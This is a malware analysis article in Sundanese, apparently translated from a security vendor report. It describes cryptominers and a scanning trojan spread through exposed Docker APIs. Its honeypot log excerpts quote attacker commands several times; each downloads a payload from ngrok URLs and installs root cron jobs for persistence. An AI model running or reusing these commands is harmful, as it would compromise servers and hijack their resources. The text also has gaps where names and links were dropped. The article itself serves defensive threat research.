Kami nganalisis data anu dikumpulkeun nganggo wadah honeypot, anu kami ciptakeun pikeun ngalacak ancaman. Sareng kami mendakan kagiatan anu penting tina panambang cryptocurrency anu teu dihoyongkeun atanapi henteu diidinan anu disebarkeun salaku wadah anu jahat ngagunakeun gambar anu diterbitkeun komunitas dina Docker Hub. gambar dipaké salaku bagian tina layanan nu delivers panambang cryptocurrency jahat.
Salaku tambahan, program pikeun damel sareng jaringan dipasang pikeun nembus wadah sareng aplikasi tatangga anu kabuka.
Kami ngantepkeun honeypots kami sapertos kitu, nyaéta, kalayan setélan standar, tanpa ukuran kaamanan atanapi pamasangan parangkat lunak tambahan. Punten dicatet yén Docker gaduh saran pikeun pangaturan awal pikeun nyegah kasalahan sareng kerentanan saderhana. Tapi honeypots dipaké wadahna, dirancang pikeun ngadeteksi serangan aimed di platform containerization, teu aplikasi di jero peti.
Aktivitas jahat anu dideteksi ogé kasohor sabab henteu meryogikeun kerentanan sareng ogé bebas tina versi Docker. Milarian gambar wadah anu teu leres dikonpigurasi, sareng ku kituna kabuka, mangrupikeun sadaya anu panyerang kedah nginféksi seueur server anu kabuka.
API Docker anu henteu ditutup ngamungkinkeun pangguna pikeun ngalakukeun rupa-rupa , kaasup meunang daptar wadah ngajalankeun, meunang log tina wadahna husus, ngamimitian, eureun (kaasup kapaksa) komo nyieun wadah anyar tina gambar husus kalawan setélan husus.
Di kénca nyaéta métode pangiriman malware. Di beulah katuhu aya lingkungan panyerang, anu ngamungkinkeun pikeun gulung jauh gambar.
Distribusi dumasar nagara 3762 Open Docker API. Dumasar pilarian Shodan tanggal 12.02.2019/XNUMX/XNUMX
Ranté serangan sareng pilihan payload
Aktivitas jahat dideteksi henteu ngan ukur ku bantosan honeypots. Data ti Shodan nunjukeun yen jumlah kakeunaan Docker API (tingali grafik kadua) geus ngaronjat saprak urang nalungtik wadah misconfigured dipaké salaku sasak pikeun nyebarkeun Monero software pertambangan cryptocurrency. Dina Oktober taun ka tukang (2018, data ayeuna kira-kira. penerjemah) ngan aya 856 API kabuka.
Pamariksaan log honeypot nunjukkeun yén panggunaan gambar wadahna ogé aya hubunganana sareng panggunaan , alat pikeun nyieun sambungan aman atawa neraskeun patalimarga ti titik nu bisa diasupan umum ka alamat atawa sumber nu tangtu (contona localhost). Hal ieu ngamungkinkeun panyerang sacara dinamis nyiptakeun URL nalika ngirimkeun muatan ka server anu kabuka. Di handap ieu conto kode tina log anu nunjukkeun panyalahgunaan jasa ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Sakumaha anjeun tiasa tingali, file anu diunggah diunduh tina URL anu terus-terusan robih. URL ieu boga tanggal béakna pondok, jadi payloads teu bisa diundeur sanggeus tanggal béakna.
Aya dua pilihan payload. Anu kahiji nyaéta panambang ELF anu disusun pikeun Linux (diartikeun Coinminer.SH.MALXMR.ATNO) anu nyambung ka kolam renang pertambangan. Nu kadua nyaéta skrip (TrojanSpy.SH.ZNETMAP.A) dirancang pikeun ménta parabot jaringan nu tangtu dipaké pikeun nyeken rentang jaringan lajeng neangan target anyar.
Skrip dropper nyetél dua variabel, anu teras dianggo pikeun nyebarkeun panambang cryptocurrency. Variabel HOST ngandung URL dimana aya file jahat, sareng variabel RIP nyaéta nami file (saleresna, hash) panambang anu bakal disebarkeun. Variabel HOST robih unggal waktos variabel hash robih. Skrip ogé nyoba mariksa yén euweuh panambang cryptocurrency séjén ngajalankeun on server diserang.
Conto variabel HOST sareng RIP, ogé snippet kode anu dianggo pikeun mariksa yén teu aya panambang sanés anu ngajalankeun.
Sateuacan ngamimitian panambang, éta namina janten nginx. Versi séjén tina skrip ieu ngaganti ngaran panambang kana jasa sah séjén nu mungkin aya dina lingkungan Linux. Ieu biasana cukup pikeun ngaliwat cék tina daptar prosés anu ngajalankeun.
Skrip milarian ogé ngagaduhan fitur. Gawéna sareng layanan URL anu sami pikeun nyebarkeun alat anu diperyogikeun. Diantarana nyaéta binér zmap, anu dianggo pikeun nyeken jaringan sareng kéngingkeun daptar palabuhan anu kabuka. Naskah ogé ngamuat binér sanés anu dianggo pikeun berinteraksi sareng jasa anu kapendak sareng nampi spanduk ti aranjeunna pikeun nangtukeun inpormasi tambahan ngeunaan jasa anu kapendak (contona, versi na).
Skrip ogé tos nangtukeun sababaraha rentang jaringan pikeun scan, tapi ieu gumantung kana versi naskah. Éta ogé nyetél palabuhan target tina jasa-dina hal ieu, Docker-saméméh ngajalankeun scan.
Pas mungkin target kapanggih, spanduk otomatis dihapus ti aranjeunna. Skrip ogé nyaring target gumantung kana jasa, aplikasi, komponén atanapi platform anu dipikaresep: Redis, Jenkins, Drupal, MODX, , Klién Docker 1.16 sareng Apache CouchDB. Upami server anu diseken cocog sareng salah sahijina, éta disimpen dina file téks, anu engké tiasa dianggo ku panyerang pikeun analisa sareng hacking salajengna. File téks ieu diunggah ka server panyerang ngalangkungan tautan dinamis. Nyaéta, URL anu kapisah dianggo pikeun unggal file, anu hartosna aksés saterasna sesah.
Vektor serangan mangrupa gambar Docker, sakumaha bisa ditempo dina dua potongan kode salajengna.
Di luhur nyaéta ngaganti ngaran jadi layanan anu sah, sarta di handap nyaéta kumaha zmap dipaké pikeun nyeken jaringan.
Di luhur aya rentang jaringan anu tos ditetepkeun, di handap aya palabuhan khusus pikeun milarian jasa, kalebet Docker.
Potret layar nunjukkeun yén gambar alpine-curl parantos diunduh langkung ti 10 juta kali
Dumasar kana Alpine Linux sareng curl, alat CLI anu cekap sumber daya pikeun nransferkeun file kana sababaraha protokol, anjeun tiasa ngawangun . Sakumaha anjeun tiasa tingali dina gambar sateuacana, gambar ieu parantos diunduh langkung ti 10 juta kali. Sajumlah ageung undeuran tiasa hartosna ngagunakeun gambar ieu salaku titik éntri; gambar ieu diropéa langkung ti genep bulan kapengker; pangguna henteu sering ngaunduh gambar sanés tina gudang ieu. Dina Docker - susunan parentah dipaké pikeun ngonpigurasikeun wadahna pikeun ngajalankeun eta. Upami setélan titik éntri henteu leres (contona, wadahna dibuka tina Internét), gambar tiasa dianggo salaku vektor serangan. Panyerang tiasa nganggo éta pikeun nganteurkeun muatan upami aranjeunna mendakan wadah anu salah konfigurasi atanapi kabuka anu teu dirojong.
Penting pikeun dicatet yén gambar ieu (alpine-curl) sorangan henteu jahat, tapi sakumaha anu anjeun tingali di luhur, éta tiasa dianggo pikeun ngalakukeun fungsi jahat. Gambar Docker anu sami ogé tiasa dianggo pikeun ngalakukeun kagiatan jahat. Kami ngahubungi Docker sareng damel sareng aranjeunna dina masalah ieu.
saran
tetep keur loba pausahaan, utamana maranéhanana ngalaksanakeun , fokus kana ngembangkeun gancang sarta pangiriman. Sagalana geus aggravated ku kudu sasuai jeung auditing jeung ngawas aturan, kudu ngawas karusiahan data, kitu ogé karuksakan gede pisan ti non-patuh maranéhanana. Ngalebetkeun otomatisasi kaamanan kana siklus kahirupan pangwangunan henteu ngan ukur ngabantosan anjeun mendakan liang kaamanan anu sanés teu kadeteksi, tapi ogé ngabantosan anjeun ngirangan beban kerja anu teu perlu, sapertos ngajalankeun software tambahan pikeun unggal kerentanan anu kapendak atanapi salah konfigurasi saatos aplikasi dipasang.
Kajadian anu dibahas dina tulisan ieu nyorot kabutuhan pikeun nganggap kasalametan ti mimiti, kalebet saran-saran ieu:
- Pikeun pangurus sistem sareng pamekar: Salawasna parios setélan API anjeun pikeun mastikeun yén sadayana dikonpigurasi pikeun nampi pamundut ti server atanapi jaringan internal khusus.
- Turutan prinsip hak pangsaeutikna: mastikeun yén gambar wadahna ditandatanganan sareng diverifikasi, ngawatesan aksés ka komponén kritis (layanan peluncuran wadahna) sareng nambihan enkripsi kana sambungan jaringan.
- Tuturkeun tur ngaktipkeun mékanisme kaamanan, f.eks. sarta diwangun-di .
- Anggo scanning otomatis tina runtimes sareng gambar pikeun kéngingkeun inpormasi tambahan ngeunaan prosés anu dijalankeun dina wadahna (contona, pikeun ngadeteksi spoofing atanapi milarian kerentanan). Kontrol aplikasi sareng ngawaskeun integritas ngabantosan parobihan anu teu normal ka server, file, sareng daérah sistem.
Trendmicro ngabantosan tim DevOps ngawangun aman, gulung gancang, sareng diluncurkeun dimana waé. Trend Micro Nyadiakeun kaamanan anu kuat, streamlined, sareng otomatis dina pipa DevOps organisasi sareng nyayogikeun sababaraha pertahanan ancaman. pikeun nangtayungan beban kerja fisik, maya sareng awan nalika waktosna. Ogé nambihan kaamanan wadahna kalawan и , anu nyeken gambar wadahna Docker pikeun malware sareng kerentanan iraha waé dina jalur pipa pangwangunan pikeun nyegah ancaman sateuacan disebarkeun.
Tanda kompromi
Hashes patali:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
on Praktek panyatur nunjukkeun setélan naon anu kedah dilakukeun heula supados ngaminimalkeun kamungkinan atanapi ngahindarkeun lengkep tina kaayaan anu dijelaskeun di luhur. Sarta dina Agustus 19-21 di hiji online intensif Anjeun tiasa ngabahas ieu sareng masalah kaamanan anu sami sareng kolega sareng guru latihan dina méja buleud, dimana sadayana tiasa nyarios sareng ngadangukeun nyeri sareng kasuksésan kolega anu ngalaman.
sumber: www.habr.com